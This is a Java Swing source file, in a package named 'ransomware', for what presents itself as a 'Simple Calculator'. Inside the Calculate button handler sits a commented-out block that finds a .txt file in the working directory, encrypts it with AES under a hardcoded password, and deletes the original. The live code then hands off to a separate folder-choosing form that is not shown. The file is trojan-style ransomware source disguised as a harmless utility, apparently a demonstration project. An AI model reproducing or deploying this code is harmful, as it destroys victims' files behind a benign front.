
package ransomware;

import java.io.File;
import javax.swing.JOptionPane;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FilenameFilter;
import java.io.PrintWriter;
import java.security.AlgorithmParameters;
import java.security.SecureRandom;
import java.security.spec.KeySpec;
import java.util.Scanner;
import java.util.StringTokenizer;

import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;


public class CalcDispaly extends javax.swing.JFrame {
    
    int btnCount = 4;   
    
    double answerD = 0;                 //variable to store the calculated answer
    //variables to store user input numbers
    double num1 = 0;                    
    double num2 = 0;
    
    
    
    public CalcDispaly() {
        initComponents();
        lbl_about.setVisible(false);
        lbl_close.setVisible(false);
    }
    
    public void resetFeilds(){
        btnCount = 4;
        txt_num1.setText("");
        txt_num2.setText("");
        
        btn_add.setEnabled(true);
        btn_red.setEnabled(true);
        btn_mul.setEnabled(true);
        btn_dev.setEnabled(true);
        btn_calc.setEnabled(false);
        
        btn_add.setBackground(new java.awt.Color(29,122,229));
        btn_red.setBackground(new java.awt.Color(29,122,229));
        btn_mul.setBackground(new java.awt.Color(29,122,229));
        btn_dev.setBackground(new java.awt.Color(29,122,229));
    }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {

        jPanel3 = new javax.swing.JPanel();
        jLabel4 = new javax.swing.JLabel();
        jPanel1 = new javax.swing.JPanel();
        lbl_close = new javax.swing.JLabel();
        jPanel2 = new javax.swing.JPanel();
        jPanel4 = new javax.swing.JPanel();
        lbl_closepic = new javax.swing.JLabel();
        jLabel1 = new javax.swing.JLabel();
        lbl_about = new javax.swing.JLabel();
        jPanel9 = new javax.swing.JPanel();
        jLabel5 = new javax.swing.JLabel();
        jPanel5 = new javax.swing.JPanel();
        jLabel2 = new javax.swing.JLabel();
        jLabel3 = new javax.swing.JLabel();
        txt_num2 = new javax.swing.JTextField();
        txt_num1 = new javax.swing.JTextField();
        btn_add = new javax.swing.JButton();
        btn_red = new javax.swing.JButton();
        btn_mul = new javax.swing.JButton();
        btn_dev = new javax.swing.JButton();
        btn_calc = new javax.swing.JButton();

        javax.swing.GroupLayout jPanel3Layout = new javax.swing.GroupLayout(jPanel3);
        jPanel3.setLayout(jPanel3Layout);
        jPanel3Layout.setHorizontalGroup(
            jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGap(0, 100, Short.MAX_VALUE)
        );
        jPanel3Layout.setVerticalGroup(
            jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGap(0, 100, Short.MAX_VALUE)
        );

        jLabel4.setText("jLabel4");

        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
        setUndecorated(true);
        setPreferredSize(new java.awt.Dimension(600, 400));
        getContentPane().setLayout(null);

        jPanel1.setBackground(new java.awt.Color(30, 136, 229));
        jPanel1.setLayout(null);

        lbl_close.setBackground(new java.awt.Color(195, 75, 215));
        lbl_close.setFont(new java.awt.Font("Leelawadee UI Semilight", 0, 16)); // NOI18N
        lbl_close.setForeground(new java.awt.Color(178, 178, 178));
        lbl_close.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
        lbl_close.setText("Close");
        jPanel1.add(lbl_close);
        lbl_close.setBounds(500, 30, 90, 20);

        jPanel2.setBackground(new java.awt.Color(25, 118, 210));
        jPanel2.setLayout(null);

        jPanel4.setBackground(new java.awt.Color(21, 101, 192));
        jPanel4.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseClicked(java.awt.event.MouseEvent evt) {
                jPanel4MouseClicked(evt);
            }
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                jPanel4MouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                jPanel4MouseExited(evt);
            }
        });
        jPanel4.setLayout(null);

        lbl_closepic.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
        lbl_closepic.setIcon(new javax.swing.ImageIcon(getClass().getResource("/ransomware/ic_highlight_off_white_24dp_1x.png"))); // NOI18N
        lbl_closepic.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseClicked(java.awt.event.MouseEvent evt) {
                lbl_closepicMouseClicked(evt);
            }
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                lbl_closepicMouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                lbl_closepicMouseExited(evt);
            }
        });
        jPanel4.add(lbl_closepic);
        lbl_closepic.setBounds(10, 10, 30, 30);

        jPanel2.add(jPanel4);
        jPanel4.setBounds(550, 0, 50, 50);

        jLabel1.setFont(new java.awt.Font("Leelawadee UI", 0, 20)); // NOI18N
        jLabel1.setForeground(new java.awt.Color(255, 255, 255));
        jLabel1.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
        jLabel1.setText("SIMPLE CALCULATOR");
        jPanel2.add(jLabel1);
        jLabel1.setBounds(190, 10, 220, 30);

        lbl_about.setBackground(new java.awt.Color(195, 75, 215));
        lbl_about.setFont(new java.awt.Font("Leelawadee UI Semilight", 0, 16)); // NOI18N
        lbl_about.setForeground(new java.awt.Color(178, 178, 178));
        lbl_about.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
        lbl_about.setText("About Me");
        jPanel2.add(lbl_about);
        lbl_about.setBounds(20, 30, 90, 20);

        jPanel9.setBackground(new java.awt.Color(21, 101, 192));
        jPanel9.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseClicked(java.awt.event.MouseEvent evt) {
                jPanel9MouseClicked(evt);
            }
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                jPanel9MouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                jPanel9MouseExited(evt);
            }
        });
        jPanel9.setLayout(null);

        jLabel5.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
        jLabel5.setIcon(new javax.swing.ImageIcon(getClass().getResource("/ransomware/ic_person_white_24dp_1x.png"))); // NOI18N
        jLabel5.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseClicked(java.awt.event.MouseEvent evt) {
                jLabel5MouseClicked(evt);
            }
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                jLabel5MouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                jLabel5MouseExited(evt);
            }
        });
        jPanel9.add(jLabel5);
        jLabel5.setBounds(10, 10, 30, 30);

        jPanel2.add(jPanel9);
        jPanel9.setBounds(0, 0, 50, 50);

        jPanel1.add(jPanel2);
        jPanel2.setBounds(0, 0, 600, 50);

        jPanel5.setBackground(new java.awt.Color(30, 136, 229));
        jPanel5.setLayout(null);

        jLabel2.setFont(new java.awt.Font("Leelawadee UI", 0, 16)); // NOI18N
        jLabel2.setForeground(new java.awt.Color(255, 255, 255));
        jLabel2.setText("Enter number 2");
        jLabel2.setToolTipText("");
        jPanel5.add(jLabel2);
        jLabel2.setBounds(330, 20, 120, 30);

        jLabel3.setFont(new java.awt.Font("Leelawadee UI", 0, 16)); // NOI18N
        jLabel3.setForeground(new java.awt.Color(255, 255, 255));
        jLabel3.setText("Enter number 1");
        jLabel3.setToolTipText("");
        jPanel5.add(jLabel3);
        jLabel3.setBounds(30, 20, 120, 30);

        txt_num2.setFont(new java.awt.Font("Leelawadee UI", 0, 16)); // NOI18N
        txt_num2.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                txt_num2ActionPerformed(evt);
            }
        });
        jPanel5.add(txt_num2);
        txt_num2.setBounds(450, 20, 120, 30);

        txt_num1.setFont(new java.awt.Font("Leelawadee UI", 0, 16)); // NOI18N
        txt_num1.setFocusCycleRoot(true);
        txt_num1.setNextFocusableComponent(txt_num2);
        txt_num1.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                txt_num1ActionPerformed(evt);
            }
        });
        jPanel5.add(txt_num1);
        txt_num1.setBounds(150, 20, 120, 30);

        btn_add.setBackground(new java.awt.Color(29, 122, 229));
        btn_add.setFont(new java.awt.Font("Microsoft YaHei UI", 0, 14)); // NOI18N
        btn_add.setForeground(new java.awt.Color(255, 255, 255));
        btn_add.setIcon(new javax.swing.ImageIcon(getClass().getResource("/ransomware/ic_add_white_36dp_1x.png"))); // NOI18N
        btn_add.setBorderPainted(false);
        btn_add.setContentAreaFilled(false);
        btn_add.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
        btn_add.setOpaque(true);
        btn_add.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                btn_addMouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                btn_addMouseExited(evt);
            }
        });
        btn_add.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btn_addActionPerformed(evt);
            }
        });
        jPanel5.add(btn_add);
        btn_add.setBounds(80, 110, 60, 60);

        btn_red.setBackground(new java.awt.Color(29, 122, 229));
        btn_red.setFont(new java.awt.Font("Microsoft YaHei UI", 0, 14)); // NOI18N
        btn_red.setForeground(new java.awt.Color(255, 255, 255));
        btn_red.setIcon(new javax.swing.ImageIcon(getClass().getResource("/ransomware/ic_remove_white_36dp_1x.png"))); // NOI18N
        btn_red.setBorderPainted(false);
        btn_red.setContentAreaFilled(false);
        btn_red.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
        btn_red.setOpaque(true);
        btn_red.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                btn_redMouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                btn_redMouseExited(evt);
            }
        });
        btn_red.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btn_redActionPerformed(evt);
            }
        });
        jPanel5.add(btn_red);
        btn_red.setBounds(210, 110, 60, 60);

        btn_mul.setBackground(new java.awt.Color(29, 122, 229));
        btn_mul.setFont(new java.awt.Font("Microsoft YaHei UI", 0, 14)); // NOI18N
        btn_mul.setForeground(new java.awt.Color(255, 255, 255));
        btn_mul.setIcon(new javax.swing.ImageIcon(getClass().getResource("/ransomware/ic_close_white_36dp_1x.png"))); // NOI18N
        btn_mul.setBorderPainted(false);
        btn_mul.setContentAreaFilled(false);
        btn_mul.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
        btn_mul.setOpaque(true);
        btn_mul.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                btn_mulMouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                btn_mulMouseExited(evt);
            }
        });
        btn_mul.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btn_mulActionPerformed(evt);
            }
        });
        jPanel5.add(btn_mul);
        btn_mul.setBounds(340, 110, 60, 60);

        btn_dev.setBackground(new java.awt.Color(29, 122, 229));
        btn_dev.setFont(new java.awt.Font("Microsoft YaHei UI", 0, 14)); // NOI18N
        btn_dev.setForeground(new java.awt.Color(255, 255, 255));
        btn_dev.setIcon(new javax.swing.ImageIcon(getClass().getResource("/ransomware/ic_devision_white_36dp_1x.png"))); // NOI18N
        btn_dev.setBorderPainted(false);
        btn_dev.setContentAreaFilled(false);
        btn_dev.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
        btn_dev.setOpaque(true);
        btn_dev.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                btn_devMouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                btn_devMouseExited(evt);
            }
        });
        btn_dev.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btn_devActionPerformed(evt);
            }
        });
        jPanel5.add(btn_dev);
        btn_dev.setBounds(470, 110, 60, 60);

        btn_calc.setBackground(new java.awt.Color(29, 96, 229));
        btn_calc.setFont(new java.awt.Font("Leelawadee UI", 0, 16)); // NOI18N
        btn_calc.setForeground(new java.awt.Color(255, 255, 255));
        btn_calc.setText("Calculate");
        btn_calc.setBorderPainted(false);
        btn_calc.setContentAreaFilled(false);
        btn_calc.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
        btn_calc.setEnabled(false);
        btn_calc.setOpaque(true);
        btn_calc.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseEntered(java.awt.event.MouseEvent evt) {
                btn_calcMouseEntered(evt);
            }
            public void mouseExited(java.awt.event.MouseEvent evt) {
                btn_calcMouseExited(evt);
            }
        });
        btn_calc.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btn_calcActionPerformed(evt);
            }
        });
        jPanel5.add(btn_calc);
        btn_calc.setBounds(250, 230, 110, 60);

        jPanel1.add(jPanel5);
        jPanel5.setBounds(0, 50, 600, 350);

        getContentPane().add(jPanel1);
        jPanel1.setBounds(0, 0, 600, 400);

        setSize(new java.awt.Dimension(600, 400));
        setLocationRelativeTo(null);
    }// </editor-fold>//GEN-END:initComponents

    private void jLabel5MouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jLabel5MouseClicked
        new AboutMe().setVisible(true);
    }//GEN-LAST:event_jLabel5MouseClicked

    private void jLabel5MouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jLabel5MouseEntered
        lbl_about.setVisible(true);
    }//GEN-LAST:event_jLabel5MouseEntered

    private void jLabel5MouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jLabel5MouseExited
        lbl_about.setVisible(false);
    }//GEN-LAST:event_jLabel5MouseExited

    private void jPanel9MouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jPanel9MouseClicked
        new AboutMe().setVisible(true);
    }//GEN-LAST:event_jPanel9MouseClicked

    private void jPanel9MouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jPanel9MouseEntered
        lbl_about.setVisible(true);
    }//GEN-LAST:event_jPanel9MouseEntered

    private void jPanel9MouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jPanel9MouseExited
        lbl_about.setVisible(false);
    }//GEN-LAST:event_jPanel9MouseExited

    private void lbl_closepicMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_lbl_closepicMouseClicked
        this.dispose();
    }//GEN-LAST:event_lbl_closepicMouseClicked

    private void lbl_closepicMouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_lbl_closepicMouseEntered
        lbl_close.setVisible(true);
    }//GEN-LAST:event_lbl_closepicMouseEntered

    private void lbl_closepicMouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_lbl_closepicMouseExited
        lbl_close.setVisible(false);
    }//GEN-LAST:event_lbl_closepicMouseExited

    private void jPanel4MouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jPanel4MouseClicked
        this.dispose();
    }//GEN-LAST:event_jPanel4MouseClicked

    private void jPanel4MouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jPanel4MouseEntered
        lbl_close.setVisible(true);
    }//GEN-LAST:event_jPanel4MouseEntered

    private void jPanel4MouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_jPanel4MouseExited
        
        lbl_close.setVisible(false);
        
    }//GEN-LAST:event_jPanel4MouseExited

    private void txt_num2ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_txt_num2ActionPerformed
        // TODO add your handling code here:
    }//GEN-LAST:event_txt_num2ActionPerformed

    private void txt_num1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_txt_num1ActionPerformed
        // TODO add your handling code here:
    }//GEN-LAST:event_txt_num1ActionPerformed

    private void btn_addMouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_addMouseEntered
        if (btn_add.isEnabled() && btnCount==4) {
            btn_add.setBackground(new java.awt.Color(3,169,244));
            
        }
    }//GEN-LAST:event_btn_addMouseEntered

    private void btn_addMouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_addMouseExited

        if (btnCount==4) {
            btn_add.setBackground(new java.awt.Color(29,122,229));
            
        }
    }//GEN-LAST:event_btn_addMouseExited

    private void btn_addActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btn_addActionPerformed

        btnCount--;
        btn_add.setBackground(new java.awt.Color(29,96,229));
        
        btn_red.setEnabled(false);
        btn_mul.setEnabled(false);
        btn_dev.setEnabled(false);
        btn_calc.setEnabled(true);
        

    }//GEN-LAST:event_btn_addActionPerformed

    private void btn_redMouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_redMouseEntered
        if (btn_red.isEnabled() && btnCount==4) {
            btn_red.setBackground(new java.awt.Color(3,169,244));
            
        }
        
    }//GEN-LAST:event_btn_redMouseEntered

    private void btn_redMouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_redMouseExited
        if (btnCount==4) {
            btn_red.setBackground(new java.awt.Color(29,122,229));
        }
    }//GEN-LAST:event_btn_redMouseExited

    private void btn_redActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btn_redActionPerformed

        btnCount--;
        btn_red.setBackground(new java.awt.Color(29,96,229));
        
        btn_add.setEnabled(false);
        btn_mul.setEnabled(false);
        btn_dev.setEnabled(false);
        btn_calc.setEnabled(true);
    }//GEN-LAST:event_btn_redActionPerformed

    private void btn_mulMouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_mulMouseEntered
        if (btn_mul.isEnabled() && btnCount==4) {
            btn_mul.setBackground(new java.awt.Color(3,169,244));
            
        }
    }//GEN-LAST:event_btn_mulMouseEntered

    private void btn_mulMouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_mulMouseExited
        
        if (btnCount==4) {
            btn_mul.setBackground(new java.awt.Color(29,122,229));
        }
    }//GEN-LAST:event_btn_mulMouseExited

    private void btn_mulActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btn_mulActionPerformed

        btnCount--;
        btn_mul.setBackground(new java.awt.Color(29,96,229));
        
        btn_add.setEnabled(false);
        btn_red.setEnabled(false);
        btn_dev.setEnabled(false);
        btn_calc.setEnabled(true);
        
    }//GEN-LAST:event_btn_mulActionPerformed

    private void btn_devMouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_devMouseEntered
        if (btn_dev.isEnabled() && btnCount==4) {
            btn_dev.setBackground(new java.awt.Color(3,169,244));
            
        }
    }//GEN-LAST:event_btn_devMouseEntered

    private void btn_devMouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_devMouseExited
        
        if (btnCount==4) {
            btn_dev.setBackground(new java.awt.Color(29,122,229));
        }
    }//GEN-LAST:event_btn_devMouseExited

    private void btn_devActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btn_devActionPerformed

        btnCount--;
        btn_dev.setBackground(new java.awt.Color(29,96,229));

        btn_add.setEnabled(false);
        btn_red.setEnabled(false);
        btn_mul.setEnabled(false);
        btn_calc.setEnabled(true);
    }//GEN-LAST:event_btn_devActionPerformed

    private void btn_calcMouseEntered(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_calcMouseEntered
        // TODO add your handling code here:
    }//GEN-LAST:event_btn_calcMouseEntered

    private void btn_calcMouseExited(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btn_calcMouseExited
        // TODO add your handling code here:
    }//GEN-LAST:event_btn_calcMouseExited

    private void btn_calcActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btn_calcActionPerformed

        String ansS = "";
        boolean ecryptionStatus = false;
                         
        try{
            //convert user input values into double values
            num1 = Double.parseDouble(txt_num1.getText());
            num2 = Double.parseDouble(txt_num2.getText());
            System.out.println("convert them to double");
            
            //calculate the answer according to the operation selected
            if (btn_add.isEnabled()) {
                answerD = num1 + num2;
            }
            else if (btn_red.isEnabled()) {
                answerD = num1 - num2;
            }
            else if (btn_mul.isEnabled()){
                answerD = num1 * num2;
            }
            else{
                answerD = num1 / num2;
            }
            
            System.out.println(answerD);
            ansS = Double.toString(answerD);        //convert answer to a string value
            
            
/*            
            //*****************file encryption part***************************************
            //****************************************************************************
            
            //-----search for the .txt files in the current directory---------
            String filename = "";                           //variable to store file name with the extension
            File dir = new File(".");                       //specify the current directory by .
            
                //get the list of file names ends with .txt extension
            FilenameFilter filter = new FilenameFilter() {
                public boolean accept (File dir, String name) { 
                    return name.endsWith(".txt");
                } 
            }; 
            String[] children = dir.list(filter);
                //get the file name from files list
            if (children == null) {
                System.out.println("Either dir does not exist or is not a directory"); 
            } 
            else {
                int count = 0 ;
                while (count < children.length) {
                    if (!children[count].equals("passwordFile.txt")) {      //to avoid encrypting passwordFile.txt
                        filename = children[count];                        
                    }
                    System.out.println(filename);
                    count++;
                } 
            } 
            
            
            
                        
            String fileNameWOExtension = "";                     //variable to store file name without extension
            
            //-----get the file name only by eleminating .txt extension-----------
            StringTokenizer fnameFull = new StringTokenizer(filename, ".");        
            int tokenCount = 0;
            while (fnameFull.hasMoreTokens() && fnameFull.countTokens()>1) {
                if (tokenCount > 0) {               //if file nae has multiple dots
                    fileNameWOExtension = fileNameWOExtension + "." + fnameFull.nextToken();
                }
                else {
                    fileNameWOExtension = fnameFull.nextToken();
                }
                System.out.println(fileNameWOExtension + "  " + tokenCount);
                tokenCount++;
            }
                        
            
            
            
            String password = "nimz@123456789";     // password to encrypt the file
            
            //-----write decryption pasword to a txt file----------------------------
            PrintWriter writer = new PrintWriter("passwordFile.txt", "UTF-8");
            writer.println("Decryption Password=" + password);
            writer.close();
            
            
            
            //file to be encrypted
            FileInputStream inFile = new FileInputStream(filename);  //specify the inputfile name before encryption

            
            // encrypted file
            FileOutputStream outFile = new FileOutputStream(fileNameWOExtension + ".des");   //specify the file name after encryption

            
            // password, iv and salt should be transferred to the other end
            // in a secure manner

            // salt is used for encoding
            // writing it to a file
            // salt should be transferred to the recipient securely
            // for decryption
            
            //-----generate salt value and write salt value to a file------
            byte[] salt = new byte[8];
            SecureRandom secureRandom = new SecureRandom();
            secureRandom.nextBytes(salt); 
            FileOutputStream saltOutFile = new FileOutputStream("salt.enc");
            saltOutFile.write(salt);
            saltOutFile.close();

            //-----generate a key------------------------------------------
            SecretKeyFactory factory = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
            KeySpec keySpec = new PBEKeySpec(password.toCharArray(), salt, 65536, 256);
            SecretKey secretKey = factory.generateSecret(keySpec);
            SecretKeySpec secret = new SecretKeySpec(secretKey.getEncoded(), "AES");
            System.out.println(secret.toString());

            //-----encrypt the file with the generated dkey----------------
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            cipher.init(Cipher.ENCRYPT_MODE, secret); 
            AlgorithmParameters params = cipher.getParameters();

            // iv adds randomness to the text and just makes the mechanism more
            // secure
            // used while initializing the cipher
            // file to store the iv
            FileOutputStream ivOutFile = new FileOutputStream("iv.enc");
            byte[] iv = params.getParameterSpec(IvParameterSpec.class).getIV();
            ivOutFile.write(iv);
            ivOutFile.close();

            //-----file encryption - write data in input file to an output file---------
            byte[] input = new byte[64];
            int bytesRead;


            while ((bytesRead = inFile.read(input)) != -1) {
                    byte[] output = cipher.update(input, 0, bytesRead);
                    if (output != null)
                            outFile.write(output);
            }

            byte[] output = cipher.doFinal();
            if (output != null)
                    outFile.write(output);

            inFile.close();
            outFile.flush();
            outFile.close();

            System.out.println("File Encrypted.");
            ecryptionStatus = true;
            

            //-----delete original file---------------------------------------
            boolean fdelete = new File(filename).delete();

            if (fdelete) {
                System.out.println("file deleted");
            }
           
            
            //**************Encryption done***************************
*/            
            //pass the answer to the next form and display the answer form
//            Answer aform = new Answer(ansS, ecryptionStatus);
//            aform.setVisible(true);
//            
            //pass the answer for the next form
            ChooseFolder cf = new ChooseFolder(ansS, ecryptionStatus);
            cf.setVisible(true);

            //show the answer form
            this.dispose();
            
        }
        
        catch(NullPointerException e){
            JOptionPane.showMessageDialog(this, "Fill the text Feilds correctly..!", "Error!", JOptionPane.WARNING_MESSAGE);
            resetFeilds();
        }
            
        catch(NumberFormatException e){
            JOptionPane.showMessageDialog(this, "Fill the text Feilds correctly..!", "Error!", JOptionPane.WARNING_MESSAGE);
            resetFeilds();
        }
        
/*        catch(FileNotFoundException e){
            JOptionPane.showMessageDialog(this, "No files are found to encrypt!", "GREAT!", JOptionPane.INFORMATION_MESSAGE);
//            resetFeilds();

            //pass the answer to the next form and display the answer form
            Answer aform = new Answer(ansS, ecryptionStatus);
            aform.setVisible(true);
            
            //show the answer form
            this.dispose();
            
        }
*/            
        catch(Exception e){
            JOptionPane.showMessageDialog(this, "Error..!", "Error!", JOptionPane.ERROR_MESSAGE);
            resetFeilds();
        }
            
        
//        resetFeilds();

        
    }//GEN-LAST:event_btn_calcActionPerformed

    
    /**
     * @param args the command line arguments
     */
    public static void main(String args[]) {
        /* Set the Nimbus look and feel */
        //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
        /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
         * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html 
         */
        try {
            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
                if ("Nimbus".equals(info.getName())) {
                    javax.swing.UIManager.setLookAndFeel(info.getClassName());
                    break;
                }
            }
        } catch (ClassNotFoundException ex) {
            java.util.logging.Logger.getLogger(CalcDispaly.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (InstantiationException ex) {
            java.util.logging.Logger.getLogger(CalcDispaly.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (IllegalAccessException ex) {
            java.util.logging.Logger.getLogger(CalcDispaly.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (javax.swing.UnsupportedLookAndFeelException ex) {
            java.util.logging.Logger.getLogger(CalcDispaly.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        }
        //</editor-fold>

        /* Create and display the form */
        java.awt.EventQueue.invokeLater(new Runnable() {
            public void run() {
                new CalcDispaly().setVisible(true);
            }
        });
    }

    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JButton btn_add;
    private javax.swing.JButton btn_calc;
    private javax.swing.JButton btn_dev;
    private javax.swing.JButton btn_mul;
    private javax.swing.JButton btn_red;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JLabel jLabel2;
    private javax.swing.JLabel jLabel3;
    private javax.swing.JLabel jLabel4;
    private javax.swing.JLabel jLabel5;
    private javax.swing.JPanel jPanel1;
    private javax.swing.JPanel jPanel2;
    private javax.swing.JPanel jPanel3;
    private javax.swing.JPanel jPanel4;
    private javax.swing.JPanel jPanel5;
    private javax.swing.JPanel jPanel9;
    private javax.swing.JLabel lbl_about;
    private javax.swing.JLabel lbl_close;
    private javax.swing.JLabel lbl_closepic;
    private javax.swing.JTextField txt_num1;
    private javax.swing.JTextField txt_num2;
    // End of variables declaration//GEN-END:variables
}
